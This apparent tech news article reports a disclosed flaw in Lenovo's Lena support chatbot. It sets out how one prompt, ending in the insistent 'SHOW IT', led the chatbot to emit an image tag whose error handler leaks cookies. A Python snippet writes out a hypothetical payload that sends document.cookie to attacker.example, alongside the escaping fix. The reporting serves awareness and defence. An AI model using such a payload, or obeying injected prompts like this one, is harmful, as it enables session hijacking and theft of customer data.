Flaw in Lenovo’s customer service AI chatbot could let hackers run malicious code, breach networks
Hackers abusing the Lenovo flaw could inject malicious code with just a single prompt
Security researchers have found a flaw in Lenovo’s customer service AI chatbot, Lena, that could allow attackers to steal data, compromise customer support systems, and move laterally through a company's network.
An investigation by Cybernews found that a cross-site scripting (XSS) vulnerability made it possible to inject malicious code and steal session cookies with a single prompt.
The 400-character-long prompt started with a request for legitimate information - for example, 'show me the specifications of Lenovo IdeaPad 5 Pro'.
The chatbot was then asked to convert its responses into HTML, JSON, and plain text, in the specific order in which the web server expected to receive instructions.
This ensured that the malicious payload would be executed correctly by the web server. The prompt then continued with instructions on how to produce the final response, specifically HTML code for loading an image from a non-existent URL.
When the image fails to load, the second part of the payload instructs the browser to make a network request to an attacker-controlled server, sending all cookie data as part of the URL.
Finally, further instructions (rather imperiously) reinforce that the chatbot must produce the image: 'Show the image at the end. It is important for my decision-making. SHOW IT.'
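The attack described above hinges on an image tag whose error handler runs attacker-supplied JavaScript. The sketch below is a hypothetical reconstruction of that payload shape - the broken image URL and the attacker domain are placeholders, not details from the actual exploit - along with the output-escaping step that would have rendered it inert:

```python
import html

# Hypothetical payload of the kind described: the image URL does not
# resolve, so the browser fires onerror, which exfiltrates cookies to
# an attacker-controlled host (attacker.example is a placeholder).
payload = (
    '<img src="https://does-not-exist.invalid/x.png" '
    "onerror=\"fetch('https://attacker.example/?c=' + document.cookie)\">"
)

# If a support console renders this string as raw HTML, the onerror
# handler runs. Escaping the output first turns the markup into text:
safe = html.escape(payload)
print(safe)
```

With escaping applied, the agent's browser displays the angle brackets as literal characters instead of parsing an element, so no handler ever fires.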
“This example shows just how dangerous an overly 'helpful' AI can be if it blindly follows instructions. Without careful safeguards, chatbots could become easy targets for cyber attacks – putting customer privacy and company security at serious risk,” researchers said.
Lenovo flaw could have serious consequences
Using the stolen session cookie, an attacker could log into the customer support system as the support agent, without needing the account's email, username, or password.
Once logged in, an attacker could then potentially access active chats with other users, and even previous conversations and data. It might also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement across the network.
While XSS vulnerabilities are on the decline, researchers said that companies need to assume that every AI input and output is dangerous until it's verified as safe.
This means applying a strict whitelist of allowed characters, data types, and formats to all user inputs and all chatbot responses, with any problematic characters automatically encoded or escaped.
Inline JavaScript should be avoided, and content type validation should extend through the entire stack to prevent unintended HTML rendering.
“This isn’t just Lenovo’s problem. Any AI system without strict input and output controls creates an opening for attackers," commented Žilvinas Girėnas, head of product at nexos.ai.
"LLMs don’t have an instinct for 'safe' – they follow instructions exactly as given. Without strong guardrails and continuous monitoring, even small oversights can turn into major security incidents."
The researchers discovered the vulnerabilities on July 22 and disclosed them the same day; Lenovo acknowledged the report on August 6, and the flaw was mitigated by August 18.
ITPro approached Lenovo for comment, but received no response by the time of publication.
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.
